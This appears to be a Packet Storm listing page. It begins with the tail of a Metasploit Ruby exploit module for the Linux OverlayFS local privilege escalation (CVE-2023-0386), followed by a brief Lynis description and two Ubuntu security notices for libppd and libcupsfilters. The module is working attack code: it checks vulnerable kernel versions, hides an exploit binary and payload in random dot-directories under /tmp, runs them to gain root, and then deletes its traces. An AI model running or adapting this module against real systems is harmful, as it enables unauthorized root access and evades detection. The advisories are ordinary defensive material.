OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])    ])  end  def check    unless kernel_arch.include?('x64')      return CheckCode::Safe("System architecture #{kernel_arch} is not supported")    end    kernel_version = Rex::Version.new(kernel_release.split('-').first)    if kernel_version < Rex::Version.new('5.11') ||       kernel_version.between?(Rex::Version.new('5.15.91'), Rex::Version.new('5.16')) ||       Rex::Version.new('6.1.9') <= kernel_version      return CheckCode::Safe("Linux kernel version #{kernel_version} is not vulnerable")    end    unless userns_enabled?      return CheckCode::Safe('Unprivileged user namespaces are not permitted')    end    vprint_good('Unprivileged user namespaces are permitted')    CheckCode::Appears("Linux kernel version found: #{kernel_version}")  end  def base_dir    datastore['WritableDir'].to_s  end  def exploit    if !datastore['ForceExploit'] && is_root?      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')    end    unless writable?(base_dir)      fail_with(Failure::BadConfig, "#{base_dir} is not writable")    end    # Upload exploit executable    exploit_dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"    exploit_path = "#{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"    mkdir(exploit_dir)    register_dir_for_cleanup(exploit_dir)    if live_compile?      vprint_status('Live compiling exploit on system...')      upload_and_compile(exploit_path, exploit_source('CVE-2023-0386', 'cve_2023_0386.c'), '-D_FILE_OFFSET_BITS=64 -lfuse -ldl -pthread')    else      vprint_status('Dropping pre-compiled exploit on system...')      upload_and_chmodx(exploit_path, exploit_data('CVE-2023-0386', 'cve_2023_0386.x64.elf'))    end    # Upload payload executable    payload_path = "#{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"    upload_and_chmodx(payload_path, generate_payload_exe)    # Launch exploit    print_status('Launching exploit...')    cmd_string = "#{exploit_path} #{payload_path} #{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"    vprint_status("Running: #{cmd_string}")    begin      output = cmd_exec(cmd_string, nil, datastore['TIMEOUT'])      vprint_status(output)    rescue Error => e      elog('Caught timeout.  Exploit may be taking longer or it may have failed.', error: e)      print_error("Exploit failed: #{e}")    ensure      # rmdir() fails here on mettle payloads, so I'm just shelling out the rm for the exploit directory.      cmd_exec("rm -rf '#{exploit_dir}'")    end  endend

Linux OverlayFS Local Privilege Escalation

Lynis is an auditing tool for Unix (specialists). It scans the system and available software to detect security issues. Beside security related information it will also scan for general system information, installed packages and configuration mistakes. This software aims in assisting automated auditing, software patch management, vulnerability and malware scanning of Unix based systems.

Lynis Auditing Tool 3.1.2

Ubuntu Security Notice 7045-1 - Simone Margaritelli discovered that libppd incorrectly sanitized IPP data when creating PPD files. A remote attacker could possibly use this issue to manipulate PPD files and execute arbitrary code when a printer is used.

    ==========================================================================Ubuntu Security Notice USN-7045-1September 26, 2024libppd vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTSSummary:libppd could be made to run programs if it received specially craftednetwork traffic.Software Description:- libppd: OpenPrinting libppdDetails:Simone Margaritelli discovered that libppd incorrectly sanitized IPP datawhen creating PPD files. A remote attacker could possibly use this issue tomanipulate PPD files and execute arbitrary code when a printer is used.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS  libppd-utils                    2:2.0.0-0ubuntu4.1  libppd2                         2:2.0.0-0ubuntu4.1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-7045-1  CVE-2024-47175Package Information:  https://launchpad.net/ubuntu/+source/libppd/2:2.0.0-0ubuntu4.1

Ubuntu Security Notice USN-7045-1

Ubuntu Security Notice 7044-1 - Simone Margaritelli discovered that libcupsfilters incorrectly sanitized IPP data when creating PPD files. A remote attacker could possibly use this issue to manipulate PPD files and execute arbitrary code when a printer is used.

    ==========================================================================Ubuntu Security Notice USN-7044-1September 26, 2024libcupsfilters vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTSSummary:libcupsfilters could be made to run programs if it received speciallycrafted network traffic.Software Description:- libcupsfilters: OpenPrinting libcupsfiltersDetails:Simone Margaritelli discovered that libcupsfilters incorrectly sanitizedIPP data when creating PPD files. A remote attacker could possibly use thisissue to manipulate PPD files and execute arbitrary code when a printer isused.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS  libcupsfilters2-common          2.0.0-0ubuntu7.1  libcupsfilters2t64              2.0.0-0ubuntu7.1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-7044-1  CVE-2024-47076Package Information:  https://launchpad.net/ubuntu/+source/libcupsfilters/2.0.0-0ubuntu7.1

Source

Packet Storm